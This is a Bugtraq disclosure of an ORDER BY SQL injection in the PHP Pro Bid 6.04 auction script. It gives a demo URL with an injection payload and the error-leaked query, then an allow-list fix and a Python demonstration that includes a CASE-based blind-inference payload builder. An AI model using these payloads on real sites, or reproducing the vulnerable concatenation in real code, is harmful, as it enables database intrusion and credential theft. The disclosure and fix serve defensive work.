Date: Fri, 19 Sep 2008 11:14:40 +0200
From: "Jan van Niekerk" <jvnkrk@...il.com>
To: bugtraq@...urityfocus.com
Subject: PHP pro bid v 6.04 SQL injection

Affected software: PHP pro bid v 6.04 (as at 2008-09-11)

Vendor description: The Leading Proffessional (sic) Auction Script
Software available online today written in PHP/ Mysql

Impact: SQL injection

Description:

categories.php and other pages of PHP Pro Bid take the sort column
(order_field) and sort direction (order_type, ASC/DESC) straight from the
request and place them in the ORDER BY clause of the listing query without
any validation.

When the injected statement fails, the software prints a helpful error
message that echoes the complete query, handing over the table and column
names:

SQL Query: SELECT a.auction_id, a.name, a.start_price, a.max_bid,
a.nb_bids, a.currency, a.end_time, a.closed, a.bold, a.hl,
a.buyout_price, a.is_offer, a.reserve_price, a.owner_id FROM
probid_auctions a WHERE a.active=1 AND a.approved=1 AND a.closed=0 AND
a.deleted=0 AND a.list_in!='store' AND a.creation_in_progress=0 GROUP
BY a.auction_id ORDER BY (select 1)x LIMIT 0, 20

Leveraging this to obtain an admin user name and password is left as an exercise for the reader.

Demo (the payload goes in order_field; order_type is a lone %20 so nothing
legitimate is appended after it):
http://example.com/phpprobidlocation/categories.php?start=0&limit=20&parent_id=669&keywords_cat_search=&buyout_price=&reserve_price=&quantity=&enable_swap=&order_field=(select%201)x&order_type=%20

Solution:
 - Don't let junior programmers add sort-by column features. The original
design was much nicer than the later hacks. Check order_field against a
fixed list of sortable column names and order_type against ASC/DESC;
never concatenate either one into the query.
 - If you fix a bug (for example, in search.php), take the trouble to
look for equivalent bugs in other pages.  Did I mention that the bug
is on another page too?  No?  Oh well.
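The sink described above and the allow-list fix from the solution, as an added example (written for this page, not PHP Pro Bid code), run against an in-memory SQLite copy of a cut-down probid_auctions table. The rows, the list of sortable columns and the error-handler behaviour are assumptions; the real application's are not on the page. It also shows why an ORDER BY injection matters even without the verbose error: a CASE expression in the sort key turns row order into a one-bit oracle per request.

```python
"""Added example, not PHP Pro Bid code: an ORDER BY injection sink beside its
allow-list fix, exercised against an in-memory SQLite table (rows constructed)."""
import sqlite3

# Columns a client may legitimately sort on (assumed for the example; the
# real application's list is not on the page).
ALLOWED_SORT_COLUMNS = {"auction_id", "name", "start_price", "end_time", "nb_bids"}
ALLOWED_DIRECTIONS = {"ASC", "DESC"}

# Cut-down version of the listing query shown in the advisory.
BASE_SQL = (
    "SELECT a.auction_id, a.name, a.start_price FROM probid_auctions a "
    "WHERE a.active=1 AND a.approved=1 AND a.closed=0 AND a.deleted=0 "
    "GROUP BY a.auction_id"
)


def build_query_vulnerable(order_field, order_type, start=0, limit=20):
    """Mirrors the bug: order_field and order_type are pasted into the SQL."""
    return f"{BASE_SQL} ORDER BY {order_field} {order_type} LIMIT {int(start)}, {int(limit)}"


def build_query_safe(order_field, order_type, start=0, limit=20):
    """Allow-list fix: only a known column name and ASC/DESC reach the SQL.
    An empty direction (the demo URL sends a lone space) defaults to ASC."""
    if order_field not in ALLOWED_SORT_COLUMNS:
        raise ValueError(f"bad sort column: {order_field!r}")
    direction = (order_type or "").strip().upper() or "ASC"
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError(f"bad sort direction: {order_type!r}")
    return f"{BASE_SQL} ORDER BY a.{order_field} {direction} LIMIT {int(start)}, {int(limit)}"


def make_db():
    """Constructed sample data: three live auctions."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE probid_auctions (auction_id INTEGER, name TEXT, "
        "start_price REAL, active INTEGER, approved INTEGER, closed INTEGER, "
        "deleted INTEGER)"
    )
    conn.executemany(
        "INSERT INTO probid_auctions VALUES (?, ?, ?, 1, 1, 0, 0)",
        [(1, "Apple", 30.0), (2, "Chair", 10.0), (3, "Desk", 20.0)],
    )
    return conn


def run(conn, sql):
    """Return the auction_id order on success. On a database error, behave
    like the application's debug handler and hand back the failed statement
    (this is the 'SQL Query: ...' message quoted in the advisory)."""
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as err:
        return f"SQL Query: {sql} ({err})"


def oracle_payload(condition):
    """ORDER BY payload whose sort key depends on a SQL condition: when it
    holds the rows come back sorted by price, otherwise by name. The caller
    reads one bit per request from the row order alone, no error needed."""
    return f"(CASE WHEN ({condition}) THEN a.start_price ELSE a.name END)"


if __name__ == "__main__":
    db = make_db()
    # The advisory's payload: a syntax error, and the handler leaks the schema.
    print(run(db, build_query_vulnerable("(select 1)x", " ")))
    # Boolean inference through row order (true condition -> price order).
    cond = "(SELECT count(*) FROM probid_auctions) > 2"
    print(run(db, build_query_vulnerable(oracle_payload(cond), "")))
    # The fixed builder refuses anything that is not a listed column.
    try:
        build_query_safe("(select 1)x", " ")
    except ValueError as err:
        print("rejected:", err)
```

The allow-list deliberately maps the request value onto a hard-coded column name rather than quoting or escaping it: identifiers cannot be bound as query parameters, so validation against a fixed set is the only reliable control for user-chosen sort columns.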

Timeline:
 - Posted this as a comment on the vendor's contact-us web form last week.
 - Sent this to Bugtraq this week (yesterday).
 - Bugtraq said not to post exploits against live sites.
 - URL of the vendor demo site duly censored, in the interests of full disclosure.
